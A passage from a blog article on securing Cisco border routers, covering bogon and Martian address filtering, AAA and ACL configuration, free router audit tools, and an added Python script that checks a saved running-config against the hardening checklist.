Bogon addresses are addresses that have not been issued by the IANA, so they should not appear on the Internet. Martians are reserved addresses and they also should not appear on the Internet. If either does appear, it is either coming from a mis-configured router or device, or it is an attack attempt of some kind (they are fake or 'spoofed' addresses). There are several ways to handle these. Team Cymru's site has more information about bogon and Martian addresses. [3]

8.a.1. Null routing - You could null route them (create a static mapping sending all bogon and Martian addresses not in use on the router to the null interface). This is my favorite method. It drops the traffic with minimal processing.

8.a.2. Use Access Control Lists (ACLs) - Set up an ACL to drop and log each violation. Although this method provides more information, it also uses up more processing power. Since one reason you may receive spoofed packets is in conjunction with a Denial of Service (DoS) attack of some kind, it seems prudent to minimize the burden on the processor, hence the suggested method above.

8.a.3. Verify unicast reverse-path - To use this method, configure Cisco Express Forwarding globally using the ip cef command, then run the command ip verify unicast reverse-path on each interface that faces the Internet. Although easy to configure, and easy on the processor, I'm not sure how well it works with a single static default route as is the case for most small organizations. I'd like to hear the thoughts of some of you Cisco pros out there about whether it works on a small network (i.e. one not running Border Gateway Protocol (BGP)).

8.b. Configure Authentication, Authorization and Accounting (AAA) - Configure the American Automotive Association... Just seeing if you're still awake! Configure AAA, even if only used locally. It allows for more granularity of access and logging of activities. You can, for example, have a log entry created for each command a user enters. Very handy for finding configuration mistakes or typos or correcting the nastiness of an intruder.

aaa new-model
aaa authentication login default local
aaa authorization commands 15 default local

8.c. Access Control Lists - Control the flow of traffic through the router with ACLs. For example, traffic from the inside interface of the router should not come in to the router from the Internet. Filter for that using an ACL. ACL configuration has to be done for your specific network. See references [3] and [4] below for more.

9. Why this article?

Quite often, at the end of a 'teaser' article like this, the author tries to sell you something. I'm not selling you anything! I want to make the Internet a safer place, and I want to make that easy for you. There are several free utilities that can help you secure your router, including:

* Router Audit Tool (RAT), from the CIS Knowledge Base
* Cisco AutoSecure
* my project, BRST - Border Router Security Tool, on SourceForge: https://sourceforge.net/projects/borderroutersec/

Of the three listed above, only the BRST is open source. RAT is available for free, but is proprietary. Cisco AutoSecure is 'free' but is not available for all router models and IOS versions and is proprietary. Compare, contrast, play, provide feedback on all three. Use great caution on production routers though! Thanks for your time!
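The checklist in sections 3 to 8.b can be verified mechanically against a saved copy of show running-config. The Python below is an added example written for this page, not code from the article or from RAT, AutoSecure or BRST; the required-line lists are taken from the sections above, and SAMPLE_CONFIG is a constructed fragment, not a real device.

```python
# Added example, not the article's or any listed tool's code: audit a saved IOS
# running-config against sections 3 to 8.b above. SAMPLE_CONFIG is constructed.
REQUIRED_GLOBAL = [  # global lines from sections 3, 4, 6 and 8.b
    "no service tcp-small-servers", "no service udp-small-servers", "no ip bootp server",
    "no service finger", "no ip http server", "no cdp run", "no ip source-route",
    "service tcp-keepalives-in", "service tcp-keepalives-out", "service password-encryption",
    "aaa new-model"]
REQUIRED_INTERFACE = [  # section 3, on every interface that is in use
    "no ip directed-broadcast", "no ip unreachables", "no ip redirects",
    "no ip mask-reply", "no ip proxy-arp"]

def parse_config(text):
    """Return (set of top-level lines, {section header: [indented child lines]})."""
    top, blocks, current = set(), {}, None
    for raw in text.splitlines():
        if not raw.strip() or raw.startswith("!"):
            continue                                  # blank line or comment
        if raw.startswith(" ") and current is not None:
            blocks[current].append(raw.strip())       # child of current section
        else:
            current = raw.strip()
            top.add(current)
            blocks.setdefault(current, [])
    return top, blocks

def audit(text):
    """Map each config section to the checklist items it is missing."""
    top, blocks = parse_config(text)
    findings = {"global": [c for c in REQUIRED_GLOBAL if c not in top]}
    for header, body in blocks.items():
        issues = []
        if header.startswith("interface ") and "shutdown" not in body:
            issues = [c for c in REQUIRED_INTERFACE if c not in body]
        elif header.startswith("line "):              # con, aux and vty lines
            issues = ["telnet allowed: " + c for c in body
                      if c.startswith("transport input") and {"telnet", "all"} & set(c.split())]
            if not any(c.startswith("exec-timeout ") for c in body):
                issues.append("no exec-timeout")      # section 5: sessions never time out
        if issues:
            findings[header] = issues
    return findings
SAMPLE_CONFIG = """\
service password-encryption
interface FastEthernet0/0
 no ip proxy-arp
interface FastEthernet0/1
 shutdown
line vty 0 4
 transport input telnet ssh
"""
```

A global line that is absent is reported even where the IOS default already disables that service, so read the "global" findings as "not explicitly set" rather than "enabled". Shut-down interfaces are skipped, matching the article's advice to shut down unused interfaces rather than harden them.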
References:

[1] NSA/SNAC Router Security Configuration Guide, Executive Summary. http://www.nsa.gov/ia/_files/routers/cisco_exec_sum.pdf
[2] NSA/SNAC Router Security Configuration Guide 1.1c. http://www.nsa.gov/ia/_files/routers/C4-040R-02.pdf
[3] Team Cymru, Secure IOS Template v6.2, 01 Feb 2010 (deitrich, noc@cymru.com).
[4] Cisco Systems, Cisco IOS Security Configuration Guide, Release 12.4.
[5] Thomas Akin, Hardening Cisco Routers, O'Reilly, 2002.
[6] BRST - Border Router Security Tool, SourceForge project. https://sourceforge.net/projects/borderroutersec/
[7] BRST - Border Router Security Tool Questionnaire, SourceForge.

source: https://www.infosecisland.com/blogview/3309-How-to-secure-a-Cisco-router.html
